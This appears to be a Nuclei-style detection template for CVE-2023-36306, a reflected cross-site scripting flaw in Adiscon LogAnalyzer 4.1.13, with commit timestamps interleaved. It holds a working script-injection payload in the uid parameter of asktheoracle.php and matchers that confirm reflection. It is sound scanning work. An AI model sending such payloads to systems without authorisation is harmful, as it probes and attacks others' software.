2023-10-17 07:20:28 +00:00
id : CVE-2023-36306
info :
name : Adiscon LogAnalyzer v.4.1.13 - Cross-Site Scripting
author : r3Y3r53
severity : medium
description : |
2023-10-17 17:52:26 +00:00
A Cross Site Scripting (XSS) vulnerability in Adiscon Aiscon LogAnalyzer through 4.1.13 allows a remote attacker to execute arbitrary code via the asktheoracle.php
2023-10-17 08:16:05 +00:00
reference :
- https://www.exploit-db.com/exploits/51643
- https://nvd.nist.gov/vuln/detail/CVE-2023-36306
2023-10-17 07:20:28 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2023-36306
2023-10-17 08:16:05 +00:00
cwe-id : CWE-79
2024-01-14 13:49:27 +00:00
epss-score : 0.00385
2024-05-31 19:23:20 +00:00
epss-percentile : 0.73054
2023-10-17 17:52:26 +00:00
cpe : cpe:2.3:a:adiscon:loganalyzer:*:*:*:*:*:*:*:*
2023-10-17 07:20:28 +00:00
metadata :
verified : true
2023-10-17 17:52:26 +00:00
max-request : 1
vendor : adiscon
product : loganalyzer
2024-01-14 09:21:50 +00:00
tags : cve2023,cve,xss,unauth,exploitdb,adiscon,adiscon-loganalyzer
2023-10-17 07:20:28 +00:00
http :
- method : GET
path :
- "{{BaseURL}}/loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
matchers :
- type : dsl
dsl :
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "><script>alert(document.domain)</script>") && contains(body, "Adiscon LogAnalyzer")'
condition : and
2024-06-01 06:53:00 +00:00
# digest: 4b0a00483046022100f97821e8560212cacd737cf3143cc95c35378c592396c0c7cca9d2e93acf482302210080da39a9593817aa30d0248c17f050014f39b550c97b784de33e60ea07a0c2e5:922c64590222798bb761d5b6d8e72950